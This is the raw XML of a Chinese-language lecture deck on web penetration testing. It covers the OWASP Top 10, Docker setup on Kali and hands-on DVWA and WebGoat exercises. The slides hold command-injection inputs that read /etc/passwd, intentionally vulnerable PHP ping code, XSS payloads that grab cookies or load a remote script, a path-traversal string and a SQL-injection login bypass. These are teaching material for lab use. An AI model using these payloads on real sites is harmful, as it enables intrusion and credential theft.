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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="294" r:id="rId3"/>
    <p:sldId id="295" r:id="rId4"/>
    <p:sldId id="296" r:id="rId5"/>
    <p:sldId id="298" r:id="rId6"/>
    <p:sldId id="328" r:id="rId7"/>
    <p:sldId id="299" r:id="rId8"/>
    <p:sldId id="303" r:id="rId9"/>
    <p:sldId id="300" r:id="rId10"/>
    <p:sldId id="301" r:id="rId11"/>
    <p:sldId id="302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319" r:id="rId36"/>
    <p:sldId id="322" r:id="rId37"/>
    <p:sldId id="323" r:id="rId38"/>
    <p:sldId id="324" r:id="rId39"/>
    <p:sldId id="325" r:id="rId40"/>
    <p:sldId id="326" r:id="rId41"/>
    <p:sldId id="327" r:id="rId42"/>
    <p:sldId id="320" r:id="rId43"/>
    <p:sldId id="266" r:id="rId44"/>
    <p:sldId id="321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  <p:sldId id="292" r:id="rId71"/>
    <p:sldId id="293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F7D05-9113-4C81-BFDD-8EA3971894D9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4C8B4-E0A1-47A6-A427-48E979EBB0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00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69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25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04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14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831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38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016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303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646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401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52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11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637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4038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140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395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3983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608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44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80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677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64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690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675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363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888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313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856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5123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177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84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61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04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48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22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41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4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1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4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2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6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7919A6-33EB-49BD-A62F-1FA56B9F9712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0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16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5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網站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試實務</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>DVWA測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>案例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7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397" y="1346662"/>
            <a:ext cx="7878747" cy="42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895931"/>
            <a:ext cx="7772400" cy="25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2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063" y="1289626"/>
            <a:ext cx="7401014" cy="48617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3190" y="542697"/>
            <a:ext cx="6837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http://localhost:8080/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291840" y="5062451"/>
            <a:ext cx="1379913" cy="3657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08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14" y="867016"/>
            <a:ext cx="8331772" cy="45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0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99" y="300413"/>
            <a:ext cx="2730732" cy="61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3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62" y="840740"/>
            <a:ext cx="8428859" cy="56348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087" y="215822"/>
            <a:ext cx="845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https://www.youtube.com/playlist?app=desktop&amp;list=PLSbrmTUy4daP4IAndCi5TsJeoDWpPxGc5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941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125" y="358602"/>
            <a:ext cx="7017323" cy="59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311" y="484632"/>
            <a:ext cx="8158730" cy="57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9701" y="209481"/>
            <a:ext cx="1383914" cy="1079823"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>輸入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01" y="1289304"/>
            <a:ext cx="8624299" cy="49947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8296" y="4873629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DaDaLONG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8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Shift-F5 ==&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>開啟開發者工具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707" y="2120900"/>
            <a:ext cx="5716585" cy="40513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354975" y="4721629"/>
            <a:ext cx="6425738" cy="1546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flipV="1">
            <a:off x="4567844" y="5052152"/>
            <a:ext cx="249382" cy="359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853717"/>
          </a:xfrm>
        </p:spPr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3845" y="1403604"/>
            <a:ext cx="8100753" cy="405079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網站安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網站安全威脅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TOP 10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Top 10 Web Application Security Risks(2021)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>OWASP Top 10 API Security Risks 2023</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網站安全測試  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OWASP Web Security Testing Guide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網站安全驗證</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Security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Verification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Standard (ASVS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>實戰</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>系統建置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>測試</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2713318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417" y="650227"/>
            <a:ext cx="8516389" cy="53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0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476762"/>
            <a:ext cx="7772400" cy="33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4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739" y="391852"/>
            <a:ext cx="8217324" cy="57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5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773" y="2120900"/>
            <a:ext cx="751645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73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623" y="641235"/>
            <a:ext cx="8764822" cy="52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9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470" y="358601"/>
            <a:ext cx="8646554" cy="61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8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919" y="574732"/>
            <a:ext cx="7844127" cy="55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1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測試環境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Kali </a:t>
            </a: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Docker +DVWA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06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6012295" cy="89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在Kali Linux 安裝Docker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[1]設定 Docker APT repository (Kali is based on Debian):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echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' &gt; /etc/apt/sources.list.d/docker.list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[2]更新APT:    apt-get update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[3]安裝 Docker:先移除舊版的{如果之前有安裝}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apt-get remove docker docker-engine docker.io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[4]再安裝 Docker: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apt-get install docker-ce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[5]測試看看是否成功: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docker run hello-world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97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啟動docker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After installation, Docker service will be started, but not enabled (i.e. it will not be started automatically after reboot). To start it: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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl start docker</a:t>
            </a:r>
            <a:endParaRPr sz="360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To start Docker automatically upon reboot (do it on your own risk!):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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl enable docker</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr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462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920" y="399011"/>
            <a:ext cx="7772400" cy="855380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網站安全 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>WeB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Security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777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430624" y="662271"/>
            <a:ext cx="73833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查看使用的版本   docker version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430624" y="5209801"/>
            <a:ext cx="8406049" cy="119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/>
              <a:t>更多docker指令請參閱</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>https://philipzheng.gitbooks.io/docker_practice/content/</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158605" y="1674152"/>
            <a:ext cx="3982244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pull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run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stop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image ls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5281408" y="3770807"/>
            <a:ext cx="2922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檢視有多少已下載的images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774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132" name="Google Shape;13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580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Google搜尋dvwa docker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="138" name="Google Shape;138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4786" y="1831440"/>
            <a:ext cx="6972198" cy="4513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591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194575" y="214219"/>
            <a:ext cx="845069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下載image:: docker pull XXXXX/YYYY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Google Shape;14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4497" y="1690689"/>
            <a:ext cx="8190853" cy="33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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657931" y="5387171"/>
            <a:ext cx="734784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pull vulnerables/web-dvwa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617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277668" y="115745"/>
            <a:ext cx="1375641" cy="10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啟動</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="153" name="Google Shape;153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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1046126"/>
            <a:ext cx="77764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run -p 80:80 -t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citizenstig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dvwa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830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606408"/>
            <a:ext cx="7772400" cy="30802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5549" y="268378"/>
            <a:ext cx="67077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admin/password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997419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35806"/>
            <a:ext cx="7772400" cy="32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5722"/>
            <a:ext cx="5739938" cy="64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90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937" y="484631"/>
            <a:ext cx="6099263" cy="60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74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671" y="1767551"/>
            <a:ext cx="6905625" cy="3943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8290" y="1289304"/>
            <a:ext cx="1982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www.ksu.edu.tw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429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889" y="450769"/>
            <a:ext cx="8284029" cy="44718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OWASP Top 10 Web Application Security Risks(2021)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89" y="1714471"/>
            <a:ext cx="8512219" cy="23430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4543" y="897954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https://owasp.org/Top10/zh_TW/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7496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8136" y="833643"/>
            <a:ext cx="518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www.ksu.edu.tw; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/passwd;echoa888168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312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8515" y="590862"/>
            <a:ext cx="767264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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>php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if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( $_POST[ 'Submit' ]  ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    // Get input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $target = $_REQUEST[ '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>' ];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    // Determine OS and execute the ping command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>stristr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>php_uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( 's' ), 'Windows NT' ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        // Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( 'ping  ' . $target );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        // *nix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( 'ping  -c 4 ' . $target );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    // Feedback for the end user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    echo "&lt;pre&gt;{$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>}&lt;/pre&gt;";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?&gt;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5050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749" y="2120900"/>
            <a:ext cx="724050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要先設定資料庫</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Google Shape;16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588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323" y="484632"/>
            <a:ext cx="5016204" cy="560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8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7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預設帳密:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Username: admin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Password: password</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;168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2124364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684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76" name="Google Shape;176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DVWA漏洞測試初體驗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749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6534" y="235816"/>
            <a:ext cx="7500240" cy="640512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285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490106" y="577563"/>
            <a:ext cx="3887932" cy="75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四種安全等級</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Google Shape;189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152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injection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25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9793" y="332509"/>
            <a:ext cx="8304414" cy="947651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OWASP Top 10 API Security Risks 2023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112280"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="332508" y="1818673"/>
          <a:ext cx="8645237" cy="4255288"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8645237">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="849086099"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5313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Risk</a:t>
                      </a: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814410"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="33207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API1:2023 - Broken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 Level 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Authorization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失效的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW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物件層級授權機制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333290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API2:2023 - Broken Authentication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失效的身份驗證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948592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API3:2023 - Broken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 Property Level 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Authorization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效的物件屬性等級授權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153412"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="45162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API4:2023 - Unrestricted Resource Consumption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無限制的資源消耗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256807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API5:2023 - Broken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Function Level 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Authorization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失效的功能等級授權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433100"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="37192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API6:2023 - Unrestricted Access to Sensitive Business Flows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對敏感業務流程的存取欠缺限制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416417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API7:2023 - Server Side Request Forgery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW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(SSRF)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伺服器端請求偽造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813403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API8:2023 - Security Misconfiguration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安全性設定錯誤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320350"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411771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API9:2023 - Improper Inventory Management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不當的資產管理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397827"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="37192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API10:2023 - Unsafe Consumption of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="16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APIsAPI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的不安全使用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283" marR="13283" marT="6641" marB="6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31491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40326" y="1180084"/>
            <a:ext cx="654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https://owasp.org/API-Security/editions/2023/en/0x11-t10/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4899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342322" y="235817"/>
            <a:ext cx="7886700" cy="78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正常輸入::216.58.200.36</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="Google Shape;20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3310" y="892753"/>
            <a:ext cx="773571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3464" y="3314031"/>
            <a:ext cx="5394863" cy="3178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227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測試型輸入::216.58.200.36;ls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212" name="Google Shape;21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730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測試型輸入::216.58.200.36; cd .. &amp;&amp; cd ..&amp;&amp; cat /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="Google Shape;219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7818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SQLi injection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894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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="234" name="Google Shape;234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4124" y="1690689"/>
            <a:ext cx="4426080" cy="29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5104" y="3526234"/>
            <a:ext cx="4310246" cy="2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001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測試輸入</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="Google Shape;242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542907"/>
            <a:ext cx="4267570" cy="28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7671" y="2868470"/>
            <a:ext cx="5277679" cy="372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116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Reflected Cross Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr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252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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;258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2316" y="1500788"/>
            <a:ext cx="4365114" cy="296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066" y="3456813"/>
            <a:ext cx="6854318" cy="296246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574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簡單的XSS payload</a:t>
            </a:r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 alert("XSS!");&lt;/script&gt;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 alert(document.cookie)&lt;/script&gt;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&lt;iframe width=333 height=333 src=tw.yahoo.com&gt; &lt;/iframe&gt;</a:t>
            </a:r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0000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測試型輸入::輸入XSS payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="273" name="Google Shape;273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8723" y="2078615"/>
            <a:ext cx="7370543" cy="32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2893705" y="1429079"/>
            <a:ext cx="49782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輸入&lt;script&gt;alert(/xss/)&lt;/script&gt;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598" y="3751552"/>
            <a:ext cx="7608667" cy="277855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14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0332FB-1A14-28D5-640C-63AE3782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89" y="266917"/>
            <a:ext cx="7064828" cy="1048077"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網站安全測試  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="27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OWASP Web Security Testing Guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="27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A3099D-D788-85BF-C95B-6D7B75788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18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練習使用底下技術測試看看:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748723" y="1576244"/>
            <a:ext cx="7886700" cy="54812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&lt;SCRIPT SRC=http://xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;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2124364"/>
            <a:ext cx="7730398" cy="435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237" y="4716892"/>
            <a:ext cx="8624236" cy="136987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692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364837" y="625296"/>
            <a:ext cx="8003308" cy="92333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javascript:/*--&gt; &lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'&gt;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198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&lt; “&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt; &lt;body onLoad=”while(true) alert(‘XSS’);”&gt; ‘”&gt;&lt;/title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="298" name="Google Shape;298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8102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Stored Cross Site Scripting (XSS)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171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3047423" cy="87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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="313" name="Google Shape;31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120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320" name="Google Shape;320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838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Inclusion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303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點選看看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>網址欄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>會有甚麼變化</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;33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9074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page=../../../../../../etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="342" name="Google Shape;342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427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50" name="Google Shape;350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Brute Force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289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662" y="260189"/>
            <a:ext cx="7772400" cy="113635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網站安全驗證</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(OWASP Application Security Verification Standard (ASVS))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28599" y="1396539"/>
            <a:ext cx="8229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https://owasp.org/www-project-application-security-verification-standard/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6934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Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="357" name="Google Shape;357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399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不必暴力破解也行::admin' #</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Google Shape;364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620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測試環境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Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5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en-US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Docker +W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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EBGOAT</a:t>
            </a:r>
            <a:endParaRPr sz="5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96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942" y="243563"/>
            <a:ext cx="8753302" cy="7705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https://hub.docker.com/r/webgoat/webgoat-8.0/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93" y="1169484"/>
            <a:ext cx="7772400" cy="33106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05631" y="4940130"/>
            <a:ext cx="53617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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>webgoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/webgoat-8.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="zh-TW" dirty="0"/>
              <a:t>docker run -p 8080:8080 -t webgoat/webgoat-8.0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049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木刻字型</Template>
  <TotalTime>104</TotalTime>
  <Words>954</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>173</Paragraphs>
  <Slides>71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8" baseType="lpstr">
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
